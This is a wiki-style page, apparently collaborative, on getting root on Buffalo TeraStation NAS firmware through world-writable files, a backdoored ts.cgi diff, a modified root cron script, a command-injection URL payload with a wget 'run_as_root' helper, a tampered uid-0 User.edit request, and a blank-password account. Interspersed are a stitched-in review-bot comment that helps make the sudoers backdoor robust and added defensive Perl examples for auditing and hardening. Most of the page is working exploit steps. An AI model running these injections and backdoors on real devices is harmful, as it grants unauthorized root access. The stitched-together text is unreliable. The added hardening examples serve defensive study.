Terastation Become root

As each release of the firmware fixes some bugs, new ways to become root must be discovered.

for 1.03 you can log in as admin, then replace /etc/passwd.
/etc is world writable, which allows us to install a customized passwd file with a known password for root.

cd /etc
mv passwd passwd-good
cp passwd-good passwd
vi passwd        (once in vi, copy the hashed password value from the admin account into root's)
exit vi (:q)
su               (use whatever password you assigned to admin, now also for root)

chown root:root /etc/passwd (if you want to keep things tidy)

su didn't seem to like an empty root password, so that's why we copy admin's. The hack described in Become_root_(2.04) may work as well, dunno, didn't see it until after I'd done the above.

- SteveK

for 1.04 you can hack /www/cgi-bin/ts.cgi
Once you have added a Terastation Serial console you can log in as admin and start to explore the [http:/ls-lR/1.04/ file system], but you are not root, yet.

There are no suid-root binaries and root comes with a password: $1$GhRqUjJ1$RPYGfyN1e4002OQ7BRkW20. You could now use a password cracker to get the cleartext password, but there must be a simpler way.

Did you already find it while browsing the [http:/ls-lR/1.04/ file system]?

No? [http:/ls-lR/1.04/_www_cgi-bin.html Look here.]

ts.cgi is the program that generates the web interface. It is quite well written and filters all input. Hacking the terastation from the web interface looks too complicated as well.

But look at the file on disk: it is world writable!

This small patch:

--- ts.cgi     Mon Apr  4 14:24:03 2005 +++ ts.cgi     Fri Apr 29 10:06:49 2005 @@ -35,6 +35,13 @@ #### QUERY_STRING�?�指定�?�るページを表示�?�る ### ### TOP ### +if ($query{'page'} eq "hack") { +   open F, ">/etc/sudoers"; +   print F "admin  ALL = (ALL) ALL\n"; +   close F; +    chmod 0440, "/etc/sudoers"; +   $query{'page'} = "top"; +} if ($query{'page'} eq "top") { require "./html/$lang/head.pl"; require "./html/$lang/body.pl";
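Review bot: `open F, ">/etc/sudoers";` has no error check, so if the open fails the `print F` and `close F` that follow act on an unopened handle and the request still falls through to `$query{'page'} = "top"` as though the write had succeeded; use the three-argument form with a check, `open(F, '>', '/etc/sudoers') or die "sudoers: $!";`. Two smaller points on the same lines: the file is created under the process umask and only tightened afterwards by `chmod 0440, "/etc/sudoers";`, so set the umask (or create the file with the final mode via sysopen) before writing it; and `print F "admin  ALL = (ALL) ALL\n";` overwrites any existing sudoers rather than adding to it, which the surrounding text should mention.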

allows you to request a "hack" page: http://myterastation.local/cgi-bin/ts.cgi?page=hack. A sudoers file will be written and you will then be redirected to the default "top" page.

Now you can use sudo to become r00t:

BUFFALO INC. TeraStation series HD-HTGL (YOSHIMUNE)
HD-HTGL113 login: admin
Password:
admin@HD-HTGL113:~$ id
uid=1000(admin) gid=100(hdusers) groups=100(hdusers)
admin@HD-HTGL113:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these two things:

        #1) Respect the privacy of others.
        #2) Think before you type.

Password:
root@HD-HTGL113:~# id
uid=0(root) gid=0(root) groups=0(root)
root@HD-HTGL113:~#

have fun.

for 2.04 you can hack /etc/cron.d/progchk
Firmware version 2.04 fixes the modes on the /www/cgi-bin directory; fortunately there are two more world-writable files on the filesystem which you can take advantage of.

The easiest approach will be to edit /etc/cron.d/progchk. This shell script is run every minute as root! Just add a couple lines to make it create an /etc/sudoers file as in the 1.04 description and give it the right modes.

#!/bin/sh
#
# 1) progchk
# 2) The existence of the program is checked in every minute.
#
echo "admin ALL = (ALL) ALL" > /etc/sudoers
chmod 440 /etc/sudoers

ls_servd () {
    # the rest of the original progchk script follows unchanged

After a minute has passed you'll be able to use sudo to become root. You should probably remove the added lines from progchk, but they won't hurt anything where they are.
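Every method so far (the world-writable /etc in 1.03, ts.cgi in 1.04, progchk in 2.04) rests on a file or directory that anyone can write. An added example, not from the page or from Buffalo, of how to audit a filesystem for such entries and clear the bit; it builds a constructed sample tree under a temp dir, and `world_writable('/etc', '/www/cgi-bin', '/etc/cron.d')` is what you would run on the box itself:

```perl
#!/usr/bin/perl
# Added example, not code from the page or from Buffalo: audit the
# directories the page shows being abused for world-writable entries.
# The sample tree built below is constructed; paths mimic the real ones.
use strict; use warnings;
use File::Find;
use File::Temp qw(tempdir);
# Return sorted "mode path" strings for every file or directory under
# @roots whose mode has the other-write bit (0002) set; symlinks skipped.
sub world_writable {
    my @roots = grep { -e $_ } @_;
    return () unless @roots;
    my @hits;
    find({ no_chdir => 1, wanted => sub {
        my $path = $File::Find::name;
        return if -l $path;
        my $mode = (lstat $path)[2];
        push @hits, sprintf("%04o %s", $mode & 07777, $path)
            if defined $mode && $mode & 0002;
    } }, @roots);
    return sort @hits;
}
# Remediate: clear the other-write bit on each path; returns how many changed.
sub fix_world_writable {
    my $fixed = 0;
    for my $p (@_) {
        my $mode = (lstat $p)[2];
        $fixed += chmod(($mode & 07777) & ~0002, $p) if defined $mode;
    }
    return $fixed;
}
# Constructed sample tree reproducing the bad modes from the page:
# world-writable /etc (1.03), /www/cgi-bin and ts.cgi (1.04), progchk (2.04).
sub make_file {
    my ($p, $m) = @_;
    open(my $fh, '>', $p) or die "$p: $!";
    print $fh "#!/bin/sh\n";
    close $fh;
    chmod $m, $p or die "chmod $p: $!";
}
my $root = tempdir(CLEANUP => 1);
mkdir $_ or die "mkdir $_: $!" for "$root/etc", "$root/etc/cron.d", "$root/www", "$root/www/cgi-bin";
chmod 0777, "$root/etc", "$root/www/cgi-bin";
make_file("$root/etc/passwd", 0644);             # sane mode, must not be reported
make_file("$root/etc/cron.d/progchk", 0666);     # root cron script, world-writable
make_file("$root/www/cgi-bin/ts.cgi", 0666);     # CGI run as root, world-writable
my @found = world_writable("$root/etc", "$root/www/cgi-bin");
print "$_\n" for @found;
printf "fixed %d entries\n", fix_world_writable(map { (split ' ', $_, 2)[1] } @found);
```

The remediation only drops the o+w bit, so a file that must be tighter still (sudoers at 0440, for instance) needs its own explicit chmod afterwards.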

for 2.14 you can still hack /www/cgi-bin/ts.cgi
During a long series of mods in which I set up opensshd and disabled telnet access, somehow I lost my ability to log in and couldn't be bothered to reflash and redo all my mods, so I had some fun and found this hack instead :-)

Most of the CGI parameters in the web interface are carefully sanity-checked. But there are still loads of system calls with the highly dangerous single parameter version! Obviously the authors never heard of Perl's taint mode. After a bit of looking, I found that the  parameter for http://terastation/ts.cgi?page=basic&mode=setup was unchecked, and ends up getting passed directly to this code:

system("/usr/local/bin/set_timezone.sh $zone");

Oops! So it only remains to craft the right URL and we can run any commands we want on the server as root :-) I wrote a simple Perl script to help do this. Example usage:

$ ./tera-cgi-hack.pl
echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd">>/etc/inetd.conf
^D
http://192.168.11.150/cgi-bin/ts.cgi?hiddenNTPServer=&mode=setup&page=basic&rdoFTP=on&rdoNTP=off&rdoNetatalk=on&txtCodepage=ISO8859_1&txtDay=1&txtHostComment=TeraStation&txtHostName=HD-HTGLD03&txtHour=16&txtLanguage=english&txtMin=7&txtMonth=7&txtNTPServer=&txtSec=37&txtTimeZone=0%3Becho%20%22telnet%20stream%20tcp%20nowait%20root%20%2Fusr%2Fsbin%2Ftcpd%20in.telnetd%22%3E%3E%2Fetc%2Finetd.conf&txtYear=2007

Log on as admin, then paste this URL into your browser, and it will run the command to enable telnet. No reflashing required :-)

You can go one step further and automate the whole process via wget, sanitizing the output with Perl:

$ ADMIN_PASSWORD=change-me
$ HACK_SCRIPT=./tera-cgi-hack.pl

$ run_as_root () {
    echo "echo MAGIC_START;$*;echo MAGIC_END" | $HACK_SCRIPT > /tmp/url
    wget --http-user=admin --http-passwd=$ADMIN_PASSWORD -O- -q $(</tmp/url) | \
        perl -0777pe "s/.*MAGIC_START\n//s;s/MAGIC_END.*//s"
}

e.g.

$ run_as_root cat /proc/cpuinfo
cpu            : 82xx
revision       : 16.20 (pvr 8081 1014)
bogomips       : 173.26
vendor         : Motorola SPS
machine        : Sandpoint

$ run_as_root uname -a
Linux HD-HTGLD03 2.4.20_mvl31-ppc_terastation #1 Fri, 01 Dec 2006 10:57:27 +0900 ppc unknown

Almost as good as a real shell ;-)

--Aspiers 18:10, 1 July 2007 (CEST)

Epilogue

I did find what hosed my telnetd and sshd in the end - details are here.
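The `system("/usr/local/bin/set_timezone.sh $zone")` call quoted in the 2.14 section is Perl's single-argument form, which hands the whole string to /bin/sh. An added example, not code from ts.cgi or from Buffalo, of that call beside a hardened version that allow-lists the value and uses the list form of system(); the accepted offset range and the function names are assumptions:

```perl
#!/usr/bin/perl
# Added example, not code from ts.cgi: the page's single-argument system()
# call beside a hardened replacement. /usr/local/bin/set_timezone.sh is the
# path the page quotes; the accepted offset range is an assumption.
use strict; use warnings;
# Vulnerable form from the page: the CGI value is interpolated into one
# string, so /bin/sh parses it and "0;echo ... >>/etc/inetd.conf" becomes a
# second command running with ts.cgi's privileges. Shown, never called here.
sub set_timezone_unsafe {
    my ($zone) = @_;
    return system("/usr/local/bin/set_timezone.sh $zone");
}
# Hardened, step 1: allow-list the value. txtTimeZone in the page's URL
# carries a whole-hour UTC offset, so accept only an optionally signed
# integer in -12..+14. \A and \z (not ^ and $) keep "0\n" from passing.
sub validate_zone {
    my ($raw) = @_;
    return undef unless defined $raw && $raw =~ /\A([+-]?\d{1,2})\z/;
    my $zone = $1 + 0;          # a capture also untaints the value under perl -T
    return ($zone < -12 || $zone > 14) ? undef : $zone;
}
# Hardened, step 2: list-form system() goes straight to execve() with no
# shell, so ';', '|', '`' or '$(...)' in the argument are bytes, not syntax.
sub set_timezone_safe {
    my ($raw) = @_;
    my $zone = validate_zone($raw);
    return { ok => 0, error => "invalid time zone parameter" } unless defined $zone;
    my $rc = system('/usr/local/bin/set_timezone.sh', $zone);
    return { ok => $rc == 0, error => $rc == 0 ? undef : "set_timezone.sh failed: $?" };
}
# Demonstration on the page's own payload (metacharacters after the zone)
# and on a few ordinary values; system() is only reached for valid input.
my $payload = '0;echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd">>/etc/inetd.conf';
for my $in ('0', '+9', '-5', '25', "0\n", $payload) {
    my $v = validate_zone($in);
    printf "%-10s -> %s\n", (split /\n/, $in)[0], defined $v ? "accepted ($v)" : "rejected";
}
my $r = set_timezone_safe($payload);
print "safe call: ", ($r->{ok} ? "ran" : "refused, $r->{error}"), "\n";
```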

for 2.46 you can set the root password with a HTTP Request
You can set the root password via the web interface by manipulating the HTTP request for updating users. If you change the uid to 0 you will be able to update the root user's password - see the example below.

I haven't tested this 100% but this changes the password for the root account in the sqlite database (/etc/melco/nas.sqlite3) that seems to be used to create the config files. As such the change to the root password should persist across firmware updates.

Process for firefox

 * 1) Log in to the terastation as admin
 * 2) Navigate to the users section
 * 3) Open the edit user settings window for any user (warning: you are about to change a user password)
 * 4) Enter a new password but do not hit OK yet
 * 5) Open up the dev tools and open the network tab
   * Default shortcut: Ctrl+Shift+Q
 * 6) Press OK on the user settings window
 * 7) Find the /nasapi/ message in the network tab where method = "User.edit" in the Params section (see example)
 * 8) Right click this request and select "Edit and Resend"
 * 9) Modify the Request Body
   * Replace the value of uid with 0
   * Replace the value of group_id with 0
   * Replace the value of sub_group_ids with [0]
 * 10) Hit the send button
   * If all goes well you should get a 200 response with some JSON content.
 * 11) Create a new user (you can delete it after)
   * It didn't work for me until I did this; it seems to flush the changes in /etc/melco/nas.sqlite3 to the /etc/shadow file

Example Request

Method: POST

HTTP Headers

Content-Type: application/json

Request Body

{
  "jsonrpc": "2.0",
  "method": "User.edit",
  "params": {
    "uid": 0,
    "mail": "",
    "password": "-- REPLACE ME --",
    "description": "",
    "use_quota": 0,
    "group_id": 0,
    "sub_group_ids": [0],
    "sid": "-- REPLACE ME --"
  },
  "id": "-- REPLACE ME --"
}
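The request above is accepted because nothing on the server checks whose account the caller may edit. An added example, not the TeraStation's nasapi code, of the server-side authorization check that would refuse it; the field names are from the example request, the session structure and the policy are assumptions, and both request bodies are constructed:

```perl
#!/usr/bin/perl
# Added example, not the TeraStation's nasapi code: the authorization check
# a User.edit handler needs so that the client cannot choose the target uid.
# Field names come from the page's example request; the session structure
# and the policy are assumptions; both request bodies are constructed.
use strict; use warnings;
use JSON::PP;
# Returns (1, undef) if the session may apply the request, else (0, reason).
# Policy: uid 0 and group 0 are never reachable through the API, the sid in
# the body must be the caller's own, and only an admin edits other accounts.
sub authorize_user_edit {
    my ($json_text, $session) = @_;
    my $req = eval { JSON::PP->new->decode($json_text) };
    return (0, "malformed JSON-RPC body") unless ref $req eq 'HASH';
    return (0, "unexpected method") unless ($req->{method} // '') eq 'User.edit';
    my $p = $req->{params};
    return (0, "missing params") unless ref $p eq 'HASH';
    for my $f (qw(uid group_id)) {
        return (0, "$f must be a non-negative integer")
            unless defined $p->{$f} && $p->{$f} =~ /\A\d+\z/;
    }
    my @subs = ref $p->{sub_group_ids} eq 'ARRAY' ? @{ $p->{sub_group_ids} } : ();
    return (0, "sub_group_ids must be integers")
        if grep { !defined($_) || $_ !~ /\A\d+\z/ } @subs;
    # A request naming uid 0 is exactly the page's attack: refuse and log it.
    return (0, "refusing edit of uid 0") if $p->{uid} == 0;
    return (0, "refusing group 0") if $p->{group_id} == 0 || grep { $_ == 0 } @subs;
    return (0, "sid mismatch") unless ($p->{sid} // '') eq ($session->{sid} // '');
    return (0, "may only edit own account")
        unless $session->{is_admin} || $p->{uid} == $session->{uid};
    return (1, undef);
}
# Constructed bodies: the page's tampered request (uid and groups forced to
# 0) and a legitimate edit of an ordinary user by the admin session.
my $tampered = '{"jsonrpc":"2.0","method":"User.edit","params":{"uid":0,"mail":"",'
             . '"password":"x","description":"","use_quota":0,"group_id":0,'
             . '"sub_group_ids":[0],"sid":"s1"},"id":"1"}';
my $legit    = '{"jsonrpc":"2.0","method":"User.edit","params":{"uid":1001,"mail":"",'
             . '"password":"x","description":"","use_quota":0,"group_id":100,'
             . '"sub_group_ids":[100],"sid":"s1"},"id":"2"}';
my $admin = { uid => 1000, is_admin => 1, sid => 's1' };   # admin is uid 1000 on the page
for my $body ($tampered, $legit) {
    my ($ok, $why) = authorize_user_edit($body, $admin);
    print $ok ? "allowed\n" : "denied: $why\n";
}
```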

on some releases you can simply log in as root
N.B. These methods do NOT give you the root password. They let you execute commands as root without relying on telnetd or sshd being enabled. Of course, once you can do this you can run passwd or replace /etc/passwd to replace the root password with one you know. At this point you also need to enable telnetd or sshd or some other more convenient way of logging in as root.

telnet-enabled releases: try myroot
Being a newbie and all, it took me a few hours to attempt the previously listed methods, all to NO GOOD USE. But I noticed the /etc/passwd file still rules in there. First of all, use your regular admin account and known password. Then vi the passwd file - it opens as RO!

BUFFALO INC. TeraStation series HD-HTGL (YOSHIMUNE)
NAS3 login: admin
Password:
admin@NAS:~# vi /etc/passwd

If you see the myroot account listed there, you're all set...

nobody:*:99:99:nobody:/home:/bin/sh
admin:$1$iO8/IO5h$CL3VF6vB3W3STxlbDRuf0/:1000:100::/home:/bin/sh
guest::1001:100::/home:/bin/sh
myroot:$1$mbPhv2uU$tdNYMFUYwn1WyzPYtT9Qb/:0:0:root:/root:/bin/bash

Log in again with myroot</tt> and blank/NO password. Then proceed to replace the root password with your own:

myroot@NAS:~# passwd root
Enter new UNIX password:
Retype new UNIX password:

You may want to change the myroot password as well - don't leave it blank!

myroot@NAS:~# passwd
Enter new UNIX password:
Retype new UNIX password:

LISTO! Now you're ready to start hacking your TeraStation OS.